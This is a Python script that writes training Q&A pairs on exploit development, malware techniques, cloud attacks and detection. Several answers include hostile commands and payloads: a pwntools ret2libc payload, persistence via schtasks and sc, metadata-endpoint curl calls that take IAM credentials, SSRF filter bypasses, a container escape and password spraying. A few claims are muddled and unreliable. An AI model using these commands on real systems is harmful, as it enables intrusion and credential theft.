#!/usr/bin/env python3
"""gen_f_fill5.py -- extend upgrade_f.jsonl with more cyber pairs"""
import json, pathlib

OUT = pathlib.Path('/workspace/data_upgrades/upgrade_f.jsonl')
OUT.parent.mkdir(parents=True, exist_ok=True)

pairs = []
def p(q, a):
    pairs.append((q, a))

# ── EXPLOIT DEVELOPMENT ──────────────────────────────────────────────────────

p("What is return-oriented programming (ROP) and how do you build a ROP chain?",
  "ROP (Return-Oriented Programming): exploit technique that chains small existing code snippets (gadgets) ending in RET instruction to execute arbitrary logic without injecting new code; defeats W^X/NX/DEP (non-executable stack). Why needed: modern OSes mark stack and heap as non-executable (NX bit on Linux, DEP on Windows); cannot jump to shellcode on stack; ROP reuses existing executable code. Gadgets: sequences of 1-5 instructions ending in RETN (0xC3); found throughout binary and its loaded libraries (libc, kernel32, ntdll); example gadgets: pop eax; ret (load value into eax); pop ebx; ret; mov [eax], ebx; ret (write to memory); int 0x80; ret (Linux syscall). Building ROP chain: (1) Find gadgets: ROPgadget --binary /bin/bash (enumerate gadgets); ropper -f binary; pwndbg gadgets command inside GDB. (2) Identify goal: call system(/bin/sh); or execve(/bin/sh, NULL, NULL). (3) Chain construction: arrange gadget addresses on stack; each RET pops next gadget address; control register values with pop gadgets; call libc function by jumping to its address with correct arguments set up. (4) Address resolution: need to defeat ASLR: information leak to get libc base address (format string bug leaks GOT entry; heap pointer leak; format string %p.%p.%p pattern); add offset from libc base to get gadget addresses at runtime. Tools: pwntools (Python library for exploit development): from pwn import *; p = process('./vuln'); rop = ROP(binary); chain constructed with API; rop.call(binary.symbols.puts, [binary.got.puts]) pattern. Ret2libc: simplest ROP; overflow buffer; overwrite return address with system() address; argument: /bin/sh string address in libc; shell spawned without NX bypass complexity.")

p("How do you exploit a format string vulnerability?",
  "Format string vulnerability: when user-controlled string passed directly to printf-family function as format string (printf(buf) instead of printf(%s, buf)). What attackers can do: read from stack (%p.%p.%p.%p -- leak stack values including return addresses and canaries); read from arbitrary addresses (%s reads string at specified stack address; use to leak GOT entries; calculate libc base for ASLR bypass); write to arbitrary addresses (%n writes number of characters printed to address on stack -- powerful write primitive). Exploitation: (1) Count offset: printf(%p.%p.%p.%p -- 100 %p's); identify where your input appears on stack (direct parameter access: %7$p to read 7th argument directly). (2) Leak canary: if stack canary at known offset N, use %N$p to read it; now canary value known for stack overflow exploit. (3) Leak libc address: GOT entry address known from binary; calculate offset to pass GOT address as stack argument; use %N$s to read string at that address (pointer to libc function = libc address); compute libc base. (4) Arbitrary write: %n writes COUNT-OF-CHARS-PRINTED to address on stack; set up desired value by printing that many chars (hhn writes 1 byte; hn writes 2 bytes; n writes 4 bytes); overwrite GOT entry for printf with system() address; next printf call becomes system call; pass /bin/sh as format string argument for shell. Example: printf(format_string) where format_string = AAAA%7$n overwrites address AAAA (in EAX on x86) with 4 (number of characters printed). Modern glibc: %n disabled by default via FORTIFY_SOURCE; format string bugs primarily useful for reads in modern exploitation. Detection: use -Wformat=2 compiler flag; static analysis; ASAN/UBSan detection.")

p("Explain heap exploitation techniques including use-after-free.",
  "Heap exploitation: attack dynamically allocated memory (malloc/free). Heap memory manager: glibc malloc uses bins (free chunks organised by size) and chunks (allocated + free regions with metadata: size, prev_size, flags). Use-After-Free (UAF): program uses pointer to memory after it was freed; freed chunk returned to free list; attacker causes different allocation to reuse same memory; attacker-controlled data now occupies structure that still-live pointer accesses; control struct function pointers or type confusion. Heap spray: fill heap with NOP sleds + shellcode; large region increases probability that any exploited pointer lands in controlled data; less precise than targeted allocation. Heap grooming/feng shui: carefully craft allocations and frees to place victim chunk adjacent to or between attacker-controlled allocations; overflow victim chunk into adjacent metadata or data. Tcache (glibc 2.26+): per-thread cache of recently freed chunks (7 per size); tcache_entry has fd pointer to next free chunk; if UAF into tcache chunk: overwrite fd pointer; next malloc of same size returns attacker-specified address (tcache poisoning); write arbitrary data to that address; bypass: tcache has no metadata integrity checks in early versions. Safe-linking (glibc 2.32+): fd pointer XOR'd with (heap_base >> 12) before storing; attacker must know heap base to poison; raised bar for exploitation. Fastbin dup: double-free in fastbin (small chunks <128 bytes); allocate chunk, free, free again (with freeing another chunk in between to pass double-free check); same chunk appears twice in fastbin list; two mallocs return same chunk; one controls data that other program uses as pointer. House of Force: overflow into top chunk (wilderness) to set size = 0xFFFFFFFF; subsequent allocation of any size wraps around; puts top chunk anywhere in address space; allocate from arbitrary address. Tools: pwndbg (heap visualisation in GDB); PEDA; pwntools heap utilities.")

p("What is ASLR and how do attackers bypass it?",
  "ASLR (Address Space Layout Randomisation): OS security feature that randomises base addresses of executable, stack, heap, and libraries at each process start; makes return-to-libc and ROP harder since absolute addresses unknown. Linux: /proc/sys/kernel/randomize_va_space: 0=off, 1=partial (stack+libs, not heap), 2=full (all); 28-bit entropy on 64-bit systems = 268 million possible addresses per library; practically unbrutable. Windows: ASLR per-module; modules must be compiled with /DYNAMICBASE; low entropy (8 bits = 256 positions) in 32-bit Windows makes brute-force feasible. Bypass techniques: (1) Information leaks: most powerful bypass; print/leak a stack address from stack canary position, libc function pointer from GOT, heap chunk pointer; calculate base address; use leaked address for ROP chain construction; format string bug is classic leak primitive. (2) Partial overwrite: if program crashes and restarts (fork-based server, e.g., PHP-FPM, Apache prefork) -- child inherits parent address space layout; lower 12 bits of address never randomised (page alignment); overwrite only 1-2 bytes of return address; limited entropy to brute force (256 or 4096 attempts typical -- often feasible). (3) Heap spraying: allocate many objects at predictable pattern; improves odds target address contains shellcode or controlled data. (4) JIT spraying: in browser/JVM: JIT-compiled code placed at predictable locations; use JIT sled of fixed-point XOR instructions that decode to shellcode as side effect. (5) Library mapping information: some applications leak address via debug output, error messages, environment variables; use proc/maps if local code execution already achieved. (6) Non-ASLR module: if one loaded DLL lacks /DYNAMICBASE (common in older apps with embedded legacy components), use its fixed addresses for ROP gadgets; entire chain built from that module.")

p("How do you write a basic buffer overflow exploit?",
  "Buffer overflow exploitation: classic example on 32-bit Linux without protections. Vulnerable program: char buf[64]; gets(buf); -- reads unlimited input into 64-byte buffer. Memory layout above buf on stack: buf[64], saved EBP[4], saved EIP[4] = return address. Step 1 -- find offset: run program in GDB; send cyclic pattern (pwntools cyclic(200) or Metasploit pattern_create); program crashes with EIP = some bytes from pattern; run cyclic_find(value) or pattern_offset to find offset to EIP = 72 bytes (64 + 4 EBP + 4 EIP). Step 2 -- confirm control: send A*72 + BBBB; EIP = 0x42424242 on crash; confirmed control. Step 3 -- shellcode or ret2libc: if NX disabled: find JMP ESP gadget (opcode FFE4); place shellcode after padding; return to JMP ESP which jumps to shellcode. If NX enabled: ret2libc -- send padding(72) + system_addr(4) + exit_addr(4) + binsh_addr(4); system() called with /bin/sh argument; shell spawned. pwntools exploit: from pwn import *; io = process('./vuln'); payload = flat({0: b'A'*72, 72: p32(system_addr), 76: p32(exit_addr), 80: p32(binsh_addr)}); io.sendline(payload); io.interactive(). Step 4 -- disable ASLR for testing: echo 0 > /proc/sys/kernel/randomize_va_space; find system and /bin/sh with: ldd ./vuln (libc base); readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system; strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh. Real world: same concepts apply but with ASLR + NX + canary + PIE -- each protection adds step: leak canary, leak libc base, build ROP chain, jump to one_gadget or system.")

# ── MALWARE ANALYSIS ──────────────────────────────────────────────────────────

p("How do you perform static malware analysis?",
  "Static malware analysis: examine malware without executing it. (1) File identification: file command (Linux) or TrID (Windows) -- identify file type from magic bytes regardless of extension; binwalk for embedded files; exiftool for metadata. (2) Hashing: MD5/SHA256 hash for identification and VirusTotal lookup (upload hash not file for OPSEC); SSDeep fuzzy hash for similarity to known malware families. (3) String extraction: strings -a -n 6 malware.exe (minimum 6 char strings); look for: URLs, domains, IP addresses (C2 indicators); file paths (persistence locations, dropped files); registry keys; API function names (imports reveal capabilities); error messages (help attribute malware family); PDB paths (debug paths reveal developer info). (4) PE analysis (Windows): PEStudio (free, comprehensive); PE structure: DOS header, PE header, section table, sections (.text=code, .data=global data, .rsrc=resources, .rdata=read-only data); suspicious: section with high entropy (packed/encrypted); non-standard section names; import table: which API functions used? (CreateRemoteThread = injection; WriteProcessMemory = injection; VirtualAllocEx = inject; RegSetValueEx = registry persistence; WinInet/WinHTTP APIs = network activity; CryptEncrypt = ransomware indicator). (5) Import/Export table: if very few imports (LoadLibrary, GetProcAddress only) = dynamic loading/obfuscation; if no suspicious imports despite obvious malware = packed (uses runtime unpacking). (6) Signature scanning: YARA rules against file; detect known malware families; write custom rules from identified patterns. (7) Disassembly: IDA Pro, Ghidra, Binary Ninja, Radare2; read assembly without executing; identify key functions; main, WinMain entry point; follow execution flow; identify anti-analysis: TEB walk for import resolution, PEB.NtGlobalFlag check (anti-debug), timing checks.")

p("How do you perform dynamic malware analysis?",
  "Dynamic malware analysis: execute malware in controlled environment and observe behaviour. Safe environment: isolated VM (VMware, VirtualBox, KVM); snapshots for clean state; network: either isolated (no external) or via INetSim/FakeNet-NG (simulate internet services). Host monitoring tools: Process Monitor (Procmon): real-time file system, registry, process, network activity; filter by PID; capture all operations during execution; export to CSV for analysis. Process Hacker / Process Explorer: view running processes, DLLs loaded, network connections, memory regions, handles; detect injected processes (parent-child inconsistencies). Regshot: snapshot registry before and after execution; compare; identify all registry changes. Wireshark: capture all network traffic; identify C2 communications, DNS queries, data exfiltration; apply protocol filters. Network simulation: INetSim: simulate HTTP, FTP, DNS, SMTP on localhost; malware connects to simulated services; observe requests; intercept C2 protocol. FakeNet-NG: Windows-native; similar to INetSim; redirect all DNS to localhost; respond to connection attempts; log and display traffic. Process behaviour: watch for: process spawning (cmd.exe, powershell.exe from Office process = macro malware); file creation (dropped payloads in %TEMP%, %APPDATA%, system dirs); registry writes (HKCU/HKLM Run keys = persistence); scheduled task creation; service installation; network connections with suspicious domains. Anti-analysis evasion: VM detection (CPUID check, RDTSC timing, registry artifacts VMware/VBox, process list check for Wireshark.exe); sleep calls (malware sleeps to outlast sandbox); process injection (malicious code in svchost -- monitor all processes not just malware PID). Automated sandboxes: Cuckoo Sandbox, any.run, Hybrid Analysis, Joe Sandbox -- submit sample; receive automated report with IOCs, network traffic, dropped files.")

p("Explain common malware persistence mechanisms on Windows.",
  "Windows persistence mechanisms: Run registry keys: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run; HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run; values here execute at user logon (HKCU) or any user logon (HKLM); requires admin for HKLM; simple, well-known, detected by most AV. RunOnce, RunServices, RunServicesOnce: similar; less commonly monitored. Scheduled tasks: schtasks /create /sc ONLOGON /tn TaskName /tr C:\\path\\payload.exe; can trigger on system start, user logon, time interval; SYSTEM privilege tasks possible; stored in C:\\Windows\\System32\\Tasks; view with schtasks /query /fo LIST /v. Services: sc create MyService binpath= C:\\path\\payload.exe start= auto; starts at boot; SYSTEM privilege; visible in services.msc; sc qc MyService to enumerate. Startup folders: C:\\Users\\USER\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup; C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp (all users); drop shortcut or executable; less stealthy but simple. WMI subscriptions: WMI event subscriptions survive reboot; __EventFilter + __EventConsumer + __FilterToConsumerBinding; trigger on event (system startup, process creation, time); no new files or registry keys visible to simple monitors; harder to detect; PowerShell: Register-WMIEvent; detected by Sysmon Event 19/20/21. DLL hijacking: place malicious DLL in application search path before legitimate one; loaded at application startup; stealthy -- piggybacks on legitimate application. COM hijacking: override per-user COM server registration (HKCU\\Software\\Classes\\CLSID\\{GUID}); user-space, no admin required; triggered when legitimate application instantiates COM object. Office add-ins: malicious Office add-in (.xlam, .ppam, .dotm) registers in Office settings; runs when Office opens. Boot/logon scripts: Group Policy startup scripts; logon scripts defined in GPO or user profile.")

p("How does ransomware encrypt files and what are defensive measures?",
  "Ransomware encryption: modern ransomware uses hybrid encryption for performance and security. Process: (1) Generate victim-specific asymmetric key pair (RSA-2048 or ECDH) locally; public key from attacker already embedded in binary. (2) Generate session symmetric key (AES-256) for file encryption -- fast for large files. (3) Encrypt each file with AES-256 (CBC or GCM mode); generate unique IV per file or per run. (4) Encrypt AES session key with victim RSA public key; embed encrypted session key in ransom note or file header. (5) Wipe original files (overwrite or delete after encryption). (6) Decryption: only possible with attacker RSA private key to decrypt AES key; no mathematical shortcut without key. Notable ransomware: WannaCry (EternalBlue propagation + AES+RSA encryption); REvil/Sodinokibi (RaaS platform); LockBit (fastest encryptor, uses I/O completion ports for speed); Conti (leaked builder); Ryuk (enterprise-targeted, manual deployment). Double extortion: encrypt AND exfiltrate data; threaten to publish if ransom not paid; Maze ransomware pioneered; now standard. Defensive measures: (1) Backups: offline, air-gapped backups tested regularly; ransomware targets VSS (Volume Shadow Copies) -- vssadmin delete shadows; 3-2-1 backup rule. (2) Privilege restriction: limit who can write to file shares; users should not have write access to entire share; compartmentalise data. (3) EDR with ransomware detection: honeypot files and directories; alert on mass file rename or encryption pattern. (4) Network segmentation: limit lateral movement before encryption stage; isolate backup infrastructure. (5) Immutable backups: WORM (Write Once Read Many) storage; Veeam hardened repository; AWS S3 Object Lock. Detection: monitor for vssadmin delete shadows (Sysmon Event 1); mass file renames with new extensions; high disk I/O from unusual process; PowerShell accessing file shares.")

p("What is process injection and what are the common techniques?",
  "Process injection: attacker code executed inside another legitimate process; evades detection by appearing as trusted process (svchost.exe, explorer.exe, lsass.exe). Classic injection: (1) OpenProcess (get handle to target process with PROCESS_ALL_ACCESS); (2) VirtualAllocEx (allocate memory in target process); (3) WriteProcessMemory (write shellcode to allocated memory); (4) CreateRemoteThread (create thread in target process to execute shellcode). DLL injection: WriteProcessMemory to write DLL path string; CreateRemoteThread with LoadLibraryA as start address pointing to DLL path string; target process loads attacker DLL. Reflective DLL injection: DLL loaded into memory without touching disk or calling LoadLibrary; DLL contains its own mini-loader (ReflectiveDLLInjection -- widely used by Metasploit/CS); evades disk-based detection. Process Hollowing (RunPE): create legitimate process (svchost.exe) in suspended state; unmap legitimate executable memory from process; write malicious executable into same address space; resume process; appears as svchost in task manager but runs malware. APC (Asynchronous Procedure Call) injection: QueueUserAPC to queue shellcode to execute when target thread enters alertable wait state; can inject into any thread that calls SleepEx or WaitForSingleObjectEx. Thread hijacking: OpenThread to suspend thread; GetThreadContext for register state; modify EIP/RIP to shellcode address; SetThreadContext; ResumeThread. Early Bird APC: create process suspended; allocate memory; write shellcode; queue APC before main thread initialises -- executes shellcode on thread alertable wait during process initialisation. Process Doppelganging: abuse Windows NTFS transactions (TxF); create transacted file write with malicious image; map image from transaction; rollback transaction (file reverts); process created from now-deleted transactional image; no artefact on disk. Detection: Sysmon Event 8 (CreateRemoteThread); Event 10 (ProcessAccess); cross-process memory writes; unsigned modules in process memory; thread start address in non-image regions.")

# ── REVERSE ENGINEERING ────────────────────────────────────────────────────────

p("How do you use Ghidra for reverse engineering?",
  "Ghidra: NSA open-source reverse engineering framework; free alternative to IDA Pro; features decompiler (C-like pseudocode from assembly), disassembler, scripting (Java/Python), binary diffing, collaborative analysis. Setup: download from ghidra-sre.org; Java 11+ required; launch ghidraRun. Importing binary: File > Import File; auto-detects format (PE, ELF, Mach-O, raw); language/compiler detection (x86:LE:32:default:gcc, ARM:LE:32:v8, etc.); analyse with default analysers (auto-analysis finds strings, functions, imports). Navigation: Symbol Tree: browse functions, imports, exports, strings; CodeBrowser: disassembly and decompiler side-by-side; Decompiler window (Window > Decompiler); middle-click to follow references; G to go to address; F to find; L to rename label; right-click > References > Show References to find all callers. Decompiler: produces readable C-like pseudocode from binary; variable renaming (L key on variable); retype variables to correct types (right-click > Retype Variable); structures defined and applied improve readability significantly. Analysis workflow: start at entry point or main (main in exports or search for reference to __libc_start_main argument); identify interesting functions; rename (L) to meaningful names as you understand them; apply structure definitions from Windows headers; annotate with comments (;). Scripting: GhidraScript in Java or Python; headless mode for batch processing: analyzeHeadless projectDir projectName -import binary.exe -postScript MyScript.java. Useful scripts: ExportFunctionNames; Find crypto constants; StringDecryptorScript pattern. Comparison with IDA: IDA Pro vastly more expensive ($thousands/seat); IDA has better processor support, more plugin ecosystem; Ghidra decompiler quality comparable; Ghidra open-source allows extending; beginners often start with Ghidra due to cost.")

p("What are common anti-debugging and anti-analysis techniques used by malware?",
  "Anti-analysis techniques: (1) IsDebuggerPresent: Win32 API reads PEB.BeingDebugged flag; if non-zero, debugger attached; bypass: patch flag to 0 in memory. (2) CheckRemoteDebuggerPresent: calls NtQueryInformationProcess with ProcessDebugPort; returns non-zero if debugger attached; similar patch bypass. (3) Timing checks: RDTSC (read timestamp counter): call twice, if difference too large (debugger slow single-step), exit or alter behaviour; GetTickCount comparison; NtQuerySystemTime. (4) Parent process check: malware check parent is explorer.exe (normal launch); if parent is WinDbg or x64dbg (suspicious), exit. (5) Process/window enumeration: CheckRemoteDebuggerPresent; EnumProcesses looking for OllyDbg.exe, Wireshark.exe, ProcessHacker.exe; FindWindow looking for debugger window titles. (6) Heap flag checks: PEB.NtGlobalFlag = 0x70 when debugger present (heap validation flags enabled); direct PEB access: mov eax, fs:[0x30]; check offset 0x68 (32-bit) or 0xBC (64-bit). (7) INT3 / exception-based: set software breakpoints detected (int3 = 0xCC); check code for CC bytes; or set up exception handler -- if no exception (debugger consumed it), different code path. (8) VM detection: CPUID with EAX=0 returns vendor string (VMwareVMware, KVMKVMKVM, VBoxVBoxVBox); RDTSC difference (VM slower); specific registry keys (SOFTWARE\\VMware, Inc.); MAC address OUI check (VMware: 00:0C:29, 00:50:56; VBox: 08:00:27); process list (vmtoolsd.exe, vboxservice.exe). (9) Sandbox detection: uptime < 5 minutes (sandbox fresh snapshot); no documents in My Documents; check for user activity (mouse movement history via GetLastInputInfo). (10) Code obfuscation: junk instructions (NOP, PUSH/POP pairs); opaque predicates (conditions always true or false but look complex); control flow flattening; VM protection (VMProtect, Themida): custom bytecode VM interprets original opcodes -- major reverse engineering obstacle.")

p("How do you analyse a packed or obfuscated binary?",
  "Packed binary analysis: packers (UPX, MPRESS, Themida, custom) compress/encrypt original code; small loader stub decompresses/decrypts to memory at runtime; original code never on disk in clear. Detection: PEiD or Detect-It-Easy (DIE) identifies packers by signature; high entropy sections (>7.0 bits/byte) in entropy viewer indicates encryption/compression; few imports (only LoadLibrary, GetProcAddress) indicates dynamic resolution. Manual unpacking: run in debugger; let loader stub execute; find OEP (Original Entry Point) -- various methods: (1) Hardware breakpoint on write to code section (OllyDbg/x64dbg: right-click on .text section memory region, set memory write BP; when execution writes unpacked code, break); (2) Find PUSHAD/POPAD pattern (common packer stub saves registers with PUSHAD at start, restores with POPAD before OEP); BP on POPAD then step to JMP OEP; (3) ESP trick: PUSHAD pushes all registers; set hardware breakpoint on [ESP] after PUSHAD; when POPAD executed, [ESP] accessed, break; OEP follows shortly. After reaching OEP: dump process memory to file (OllyDump plugin, PE Dump from x64dbg, Scylla); fix import table (Scylla ImpRec: scan for imports, identify IAT, fix dump); result: unpacked PE analysable in IDA/Ghidra. UPX specifically: upx -d packed.exe (if standard UPX); if customised UPX header bytes modified to prevent auto-unpack, do manually. Code obfuscation (OLLVM, Tigress): control flow flattening makes analysis hard; use symbolic execution (angr, Triton) to recover true control flow; concolic execution traces paths. VM protection (VMProtect, Themida): last resort -- very time-intensive; identify VM entry/exit bytecode interpretation loop; manually map bytecodes to original operations; usually only worth for high-value targets; specific deobfuscators exist for some VM products.")

p("What is code signing and how can it be abused?",
  "Code signing: process of attaching digital signature to executable to verify publisher identity and detect tampering; signature based on private key; verified using publisher certificate. Windows: Authenticode; certificate from CA (DigiCert, Comodo, Sectigo); sign with signtool.exe /a /f cert.pfx /p password binary.exe; Windows checks signature on execution; SmartScreen reputation based on certificate. Linux: GPG signatures for packages; Kernel Module Signing (kernel built with module signing support requires signed .ko files); Secure Boot verifies bootloader and kernel signatures. macOS: Gatekeeper checks app signature; notarization (Apple scans app for malware); spctl --assess binary checks status. Abuse techniques: (1) Stolen code signing certificates: attackers compromise certificate private keys of legitimate software companies; sign malware with legitimate certificate; high AV bypass rate; Stuxnet used stolen Realtek and JMicron certificates; common in APT campaigns. (2) Certificate theft: private key extraction from code signing HSMs (if poorly configured); from developer workstations; from build servers (supply chain). (3) Signing with cheap OV certificates: get legitimate Organisational Validation certificate ($100-$500); sign malware; SmartScreen won't flag signed unknown publisher less aggressively; some AV engines trust signed binaries more. (4) Self-signed certificates: sign with attacker-generated certificate; defeats tampering detection but not publisher verification; used for internal tools. (5) Binary patching after signing: modify resources or version info after signing; signature becomes invalid but some Windows API calls do not fully validate; timestamping complication. (6) Catalog-signed binaries: Windows catalog (security.cat) can sign individual files without embedding signature; WDAC policy allows catalog-signed files. Detection: check certificate chain for known malware; hunt for certificates revoked after abuse; VirusTotal checks certificate status.")

# ── CLOUD SECURITY ─────────────────────────────────────────────────────────────

p("How do you perform AWS security assessment?",
  "AWS security assessment methodology: (1) IAM enumeration: aws iam get-account-authorization-details (list all users, groups, roles, policies -- requires IAM:List permissions but get-account-summary usable without full IAM access); aws iam list-users; aws iam list-roles; identify overprivileged roles. (2) S3 bucket enumeration: aws s3 ls (list all buckets in account); for each bucket: aws s3api get-bucket-acl --bucket BUCKET (check if public); aws s3api get-bucket-policy --bucket BUCKET; test unauthenticated access with unauthenticated AWS CLI or curl. (3) EC2 enumeration: aws ec2 describe-instances --query Reservations[*].Instances[*].[InstanceId,PublicIpAddress,Tags] (list instances and IPs); aws ec2 describe-security-groups (find open security groups: 0.0.0.0/0 on ports 22, 3389, sensitive ports). (4) Secrets scanning: aws secretsmanager list-secrets; aws ssm get-parameters-by-path --path / --recursive (SSM Parameter Store); environment variables in Lambda (aws lambda get-function-configuration --function-name NAME | grep -i secret). (5) Metadata service exploitation: from EC2 instance: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ (list instance role); curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE-NAME (get temporary credentials); use credentials for lateral movement. SSRF to IMDS: if web application vulnerable to SSRF, fetch http://169.254.169.254/latest/meta-data/iam/security-credentials/; exfiltrate AWS credentials. IMDSv2 mitigation: requires session token (PUT to /latest/api/token first); SSRF-based IMDS attacks blocked if attacker cannot make PUT request. Tools: ScoutSuite (multi-cloud security auditing tool); Prowler (AWS CIS benchmark checks); CloudMapper (visualise AWS environment); Pacu (AWS exploitation framework); Principal Mapper (IAM privilege escalation paths).")

p("What is the shared responsibility model in cloud security?",
  "Shared responsibility model: cloud provider (AWS/Azure/GCP) and customer share security responsibilities; boundary varies by service type. Infrastructure as a Service (IaaS -- EC2, Azure VMs, GCP Compute): provider secures: physical datacentre, hardware, hypervisor, network infrastructure; customer secures: guest OS (patching), middleware, applications, data, IAM, network configuration (Security Groups/NSGs), encryption. Platform as a Service (PaaS -- RDS, Lambda, Azure App Service): provider additionally secures: OS, runtime, middleware; customer secures: application code, data, IAM configuration, application-level security settings. Software as a Service (SaaS -- Office 365, Salesforce, Google Workspace): provider secures nearly everything; customer secures: user access management, data configuration, proper use/sharing settings, MFA enforcement. Common customer mistakes in shared model: (1) Leaving S3 buckets public (customer responsibility to configure ACLs); (2) Not patching EC2 instance OS (customer responsibility); (3) Weak IAM policies (customer responsibility -- AWS IAM Analyzer helps); (4) Not encrypting data at rest (customer chooses encryption settings); (5) No MFA on AWS root account (customer responsibility). Security controls customer always owns: Identity and access management (who accesses what); data classification and protection; network security controls (Security Groups, WAF rules, NACLs); compliance and regulatory requirements; application security; logging and monitoring configuration (CloudTrail enabled in all regions). AWS Artifact: provides compliance documentation and reports; helps customers with audit requirements. AWS Well-Architected Framework Security Pillar: guidance for implementing shared responsibility effectively.")

p("How do you exploit misconfigured Azure Active Directory?",
  "Azure AD (now Entra ID) security assessment: (1) Tenant enumeration: validate tenant domain: https://login.microsoftonline.com/DOMAIN.com/.well-known/openid-configuration; user enumeration via login.microsoftonline.com (valid users return AADSTS50126 wrong password, invalid return AADSTS50034); AADInternals PowerShell module for comprehensive enumeration. (2) Password spray: avoid lockout -- one attempt per user per 30 min; MSOLSpray, Spray, TeamFiltration for Teams-specific spray; target admin accounts (globaladmin@domain.com, azureadmin@domain.com); avoid MFA-protected accounts. (3) OAuth phishing (device code flow): attacker initiates device code flow (POST to /devicecode); sends code to victim via phishing email; victim authenticates to microsoft.com and enters code; attacker polls /token endpoint; receives access tokens without seeing credentials or triggering MFA. (4) Token theft: steal access tokens from browser local storage; intercept token in Man-in-the-Middle; Evilginx/Modlishka (reverse proxy phishing) captures session cookies including post-MFA tokens. (5) Service principal and app registration abuse: list all app registrations (Get-AzureADApplication); find apps with overprivileged permissions; check for app secrets (client credentials) stored insecurely; guest users who have app registrations. (6) Conditional Access bypass: find gaps in CA policies (policies may not cover all apps; legacy authentication (SMTP, IMAP, POP) bypasses MFA CA policies); enable legacy auth in tenant to bypass MFA. (7) Azure AD Connect: if hybrid (on-prem AD + Azure AD); Azure AD Connect service account has DCSync rights on-prem; compromise Azure AD Connect server = DCSync on-prem AD. (8) PIM exploitation: if PIM (Privileged Identity Management) misonfigured; role activation without approval or MFA; check if activation policies enforced. Tools: ROADtools (Azure AD assessment); BloodHound with AzureHound (attack path analysis); MicroBurst (Azure security tools); o365creeper (user enumeration).")

p("What security risks do Kubernetes clusters face?",
  "Kubernetes security threats: (1) Exposed API server: default kube-apiserver may be internet-accessible; unauthenticated access allows full cluster control; Shodan finds exposed kubelets (port 10250) and API servers (6443); common in improperly configured cloud clusters. (2) Misconfigured RBAC: ClusterRoleBindings with ClusterAdmin to service accounts; verbs: [*] resources: [*]; wildcard permissions; poorly scoped roles; system:unauthenticated group with permissions. (3) Container escape: privileged container (securityContext: privileged: true) has access to host devices; mount host filesystem and escape; nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash (enter host namespace from privileged container); capabilies (SYS_ADMIN, SYS_PTRACE) allow namespace escapes. (4) Service account token abuse: default service account token mounted in every pod; token auto-mounts by default; attacker in any pod has API access with service account permissions; automountServiceAccountToken: false in pod spec unless needed. (5) Secrets in environment variables: Kubernetes secrets base64 encoded (not encrypted) by default in etcd; if etcd unencrypted or accessible: all secrets readable; secrets in pod env vars visible in kubectl describe pod. (6) Supply chain: malicious container images; compromised image registry; no image signing verification. (7) Lateral movement: compromise one pod; use service account token; access other namespaces; move to more privileged pods. Attack tools: kube-hunter (automated k8s security scanner); Peirates (k8s penetration tool); CDK (Container and K8s penetration toolkit); kube-bench (CIS benchmark checks). Defense: Network Policies (deny all ingress/egress, allow selectively); Pod Security Standards (Restricted); OPA Gatekeeper admission control; Falco runtime detection; encrypted etcd; image scanning and signing; mTLS between pods (Istio/Linkerd service mesh).")

p("How does SSRF (Server-Side Request Forgery) work and how do you exploit it?",
  "SSRF: attacker causes server to make HTTP requests to attacker-specified URLs; server acts as proxy; bypasses firewalls that protect internal resources. Basic SSRF: web application fetches URL from user input (curl $url, fetch(url), requests.get(url)); attacker sets url=http://internal-service/admin or url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ (AWS metadata). Impact depends on what internal services exist: cloud metadata (AWS/GCP/Azure): get IAM credentials for privilege escalation; internal APIs without authentication; Redis/Memcached (no auth by default on internal network): Redis supports SSRF via Gopher protocol to execute arbitrary commands; internal admin panels; port scanning of internal network. SSRF bypass techniques for filters: (1) DNS rebinding: domain that resolves to public IP first (passes whitelist) then rebinds to 127.0.0.1 (actual request goes to localhost). (2) IP address obfuscation: 2130706433 (decimal for 127.0.0.1); 0x7f000001 (hex); 0177.0.0.1 (octal); 127.1 (short notation). (3) Redirect bypass: attacker-controlled server returns 302 redirect to internal address; server follows redirect. (4) URL parser inconsistencies: http://attacker.com@internal-host/ (some parsers use host after @); http://internal-host%00.attacker.com (null byte truncation). (5) Protocol bypass: file:// (read local files); gopher:// (send raw TCP data -- powerful for Redis/SMTP attacks); dict:// (port scanning). Blind SSRF: no response content visible; use out-of-band (Burp Collaborator, interactsh) -- server makes DNS/HTTP request to unique subdomain; confirms SSRF; upgrade to non-blind with redirect or timing. Defense: allowlist of permitted URLs/IPs; block 169.254.169.254 (metadata) and RFC1918 private ranges; use separate network for external fetches; IMDSv2 on AWS (mitigates IMDS SSRF).")

p("What is cloud trail analysis and how do you detect threats in AWS?",
  "CloudTrail: AWS service that logs API calls across AWS account; records: who made call (IAM user/role), what action (API name), when (timestamp), from where (source IP), on what resource (ARN), success/fail. Enabling: CloudTrail > Trails > Create trail; enable for all regions; enable S3 data events (bucket access) and Lambda data events; enable CloudWatch Logs integration; use S3 server-side encryption for trail storage. Key events to monitor: Authentication: ConsoleLogin (failed = brute force; unusual geography = credential theft); GetFederationToken (unusual role federation). IAM changes: CreateUser, AttachUserPolicy, CreateAccessKey, UpdateLoginProfile (password change), DeleteTrail (attacker covering tracks), StopLogging. Privilege escalation patterns: CreatePolicy + AttachUserPolicy; SetDefaultPolicyVersion to older permissive version; CreateRole + PassRole + AttachRolePolicy. Data access: GetObject (unusual volume on sensitive buckets); ListBuckets by unfamiliar user; GetSecretValue from Secrets Manager. Resource changes: AuthorizeSecurityGroupIngress (opening firewall rules); RunInstances (launching cryptominer EC2); CreateNetworkAclEntry. SIEM integration: CloudTrail to CloudWatch Logs to GuardDuty; or stream to S3, then S3 to Splunk/Elastic SIEM; Splunk TA for AWS parses CloudTrail. AWS GuardDuty: ML-based threat detection from CloudTrail, VPC Flow Logs, DNS logs; pre-built detectors: Trojan:EC2/DropPoint (known malware outbound), Recon:IAMUser/MaliciousIPCaller, UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration (IMDS credentials used from external IP), CryptoCurrency:EC2/BitcoinTool.B. CloudTrail Insights: anomaly detection on API call rates; detect unusual GetSecretValue volumes, CreateNetworkAcl spikes.")

